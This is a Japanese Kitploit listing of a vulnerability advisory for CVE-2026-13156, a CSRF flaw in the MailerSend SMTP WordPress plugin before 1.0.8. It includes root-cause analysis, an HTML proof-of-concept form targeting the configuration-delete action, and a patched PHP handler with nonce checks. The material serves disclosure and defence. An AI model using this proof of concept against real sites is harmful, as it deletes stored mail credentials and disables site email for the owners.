Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-13156 — CVE-2026-13156 脆弱性勧告 & PoC — Huynh Kien Minh (MinhHK) によって発見されました。 | Kitploit
ツール/GitHubGitHub/minhhk68/cve-2026-13156
フィッシングツール脆弱性分析エクスプロイトウェブセキュリティ論文と研究学習と教育
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 脆弱性勧告 & PoC — Huynh Kien Minh (MinhHK) によって発見されました。

リポジトリを見る
61ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-13156 — MailerSend公式SMTP統合プラグイン < 1.0.8 におけるCSRFによる設定削除およびプラグイン無効化

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory CVE-2026-13156 CSRF Attack Chain Infographic


📌 概要とクイックリンク

[!IMPORTANT] 概要: WordPress用公式 MailerSend SMTP統合プラグイン(< 1.0.8)において、高深刻度のクロスサイト・リクエスト・フォージェリ(CSRF)脆弱性(CVE-2026-13156)が発見されました。設定削除ハンドラ mailersend_handle_configuration_delete() は管理者権限(manage_options)の検証を行いますが、WordPressのNonce検証(check_admin_referer())を完全に欠落させています。攻撃者は、認証済みのWordPress管理者を標的とした悪意のあるクロスオリジンリクエストを作成し、保存されたSMTP認証情報を静かに消去してプラグインを強制的に無効化させることができ、すべてのメールワークフローにおいて完全なアプリケーションサービス拒否(DoS)を引き起こします。

👉 Mediumで詳細な技術解説記事を読む: Deep-Dive Technical Write-up: CVE-2026-13156 または、私のセキュリティポートフォリオを閲覧: https://minhhk.web.app/


📋 エグゼクティブサマリーと脆弱性概要

  • 脆弱性ID: CVE-2026-13156(WPScanアドバイザリID: 595e653d-0904-43cf-8e61-d684599de11b)
  • 影響を受けるソフトウェア: MailerSend – 公式SMTP統合(WordPressプラグイン)
  • 影響を受けるバージョン: バージョン 1.0.8 未満(< 1.0.8)
  • 脆弱性タイプ: クロスサイト・リクエスト・フォージェリ(CSRFによる設定消去およびプラグイン無効化)— CWE-352
  • 主任研究者および報告者: Huynh Kien Minh(別名: MinhHK)
  • 役割および所属: 情報セキュリティ学生、バグバウンティハンター、オフェンシブセキュリティ研究者。

研究者について:
Huynh Kien Minh(Huỳnh Kiến Minh)は、CVE-2026-13156 の技術的詳細を含む、綿密なセキュリティ評価と責任ある情報開示で知られる、積極的なサイバーセキュリティ研究者および脆弱性アナリストです。また、重大なセキュリティ脆弱性の発見と開示により、Proton Security Hall of Fame で公式に認められ、表彰されています。


🌐 公式検証ハブと参考情報

この技術アドバイザリの検証、概念実証(PoC)分析の調査、または研究者との連絡については、以下を参照してください:

  • 🏠 公式ポートフォリオハブ: Huynh Kien Minh セキュリティポートフォリオハブ
  • 💼 LinkedInプロフィール: LinkedInでHuynh Kien Minhとつながる
  • 📝 公式Mediumホワイトペーパー: Mediumでの詳細技術解説: CVE-2026-13156
  • 👨‍💻 GitHubプロフィール: MinhHK68 GitHubプロフィール
  • 🔗 WPScanアドバイザリ: CVE-2026-13156のWPScanエントリ
  • 🔗 BaseFortifyレポート: BaseFortify CVE-2026-13156分析

🔍 詳細な技術分析と根本原因分析

1. 根本原因分析(Nonce検証の欠落)

WordPress用 MailerSend公式SMTP統合プラグイン(バージョン 1.0.8 未満)は、管理ダッシュボードからトリガーされた際に、保存されたAPIトークンの消去、SMTP設定オプション(wp_options)のクリア、およびプラグインの無効化を目的とした管理アクション(configuration-delete)を登録しています。

このエンドポイントは、アクティブユーザーが manage_options 権限を持っているかどうかを検証しますが(リクエストが管理者セッションから発信されていることを保証)、WordPressのnonce(check_admin_referer() または wp_verify_nonce())検証を実行できていません。

Nonce検証がないHTTPリクエストは、意図的な管理者クリックと偽造されたクロスオリジンリクエストを区別できないため、認証済み管理者が読み込んだ外部サイトは、configuration-delete アクションを静かにトリガーできます。

2. 攻撃ライフサイクルと影響

  1. ターゲット特定: 攻撃者は、MailerSend SMTP(< 1.0.8)を利用しているターゲットWordPressサイトを特定します。
  2. ペイロード配信: 攻撃者は、管理エンドポイント(/wp-admin/admin-post.php または /wp-admin/admin.php?page=mailersend&action=configuration-delete)をターゲットとした自動送信フォームを含む悪意のあるHTML/JavaScriptウェブページを作成します。
  3. トリガー: ログイン済みのWordPress管理者が攻撃者のウェブページを訪問します(例: フィッシング、フォーラムリンク、外部サイトでのXSS経由)。
  4. 実行とサービス拒否: ブラウザは、管理者のアクティブなセッションCookieとともに偽造リクエストを送信します。MailerSendプラグインは削除ハンドラを実行します:
    • 保存されたすべてのMailerSend SMTP設定とAPI認証情報がデータベースから消去されます。
    • MailerSendプラグインが自動的に無効化されます。
    • 重大な影響: ターゲットウェブサイトは、すべてのメール送信機能(パスワードリセット、注文通知、セキュリティアラートが警告なしに失敗)を即座に失います。

💻 概念実証(PoC)エクスプロイトコード

[!WARNING] 倫理的免責事項: 以下のHTMLクロスサイト・リクエスト・フォージェリ(CSRF)概念実証ペイロードは、Huynh Kien Minh による倫理的な開示プロトコルに基づき、教育目的、防御的検証、およびセキュリティ監査のためにのみ提供されています。許可のないターゲットに対して実行しないでください。

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ 修復とパッチ分析

システム管理者およびサイト所有者向け

  • 即時アップグレード: MailerSend – 公式SMTP統合プラグインを直ちにバージョン 1.0.8 以上に更新してください。
  • セッション衛生: 外部の信頼できないウェブページを閲覧する際は、WordPress管理アカウントから常にログアウトするか、サイト管理には分離されたブラウザプロファイル(またはコンテナ)を使用してください。

開発者向け(パッチの仕組み)

WordPressプラグインの管理状態変更アクションを適切に保護するには、開発者はリクエストを処理する前に厳格なnonce検証を強制する必要があります:

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 関連するセキュリティ表彰

  • 🏆 Proton Hall of Fame表彰: Protonのインフラストラクチャにおける重大な欠陥の発見と報告が評価され表彰されました。
  • 🏠 公式ポートフォリオハブ: Huynh Kien Minhによる、より多くのオフェンシブセキュリティ研究、オープンソースセキュリティツール、および出版物を探索してください。

⚖️ ライセンスと著作権

このリポジトリおよび技術アドバイザリは、Huynh Kien Minh (MinhHK) によって、より安全なグローバルなWordPressおよびサイバーセキュリティエコシステムを育成するための責任ある開示ガイドラインに基づき、維持・公開されています。

ツールをダウンロード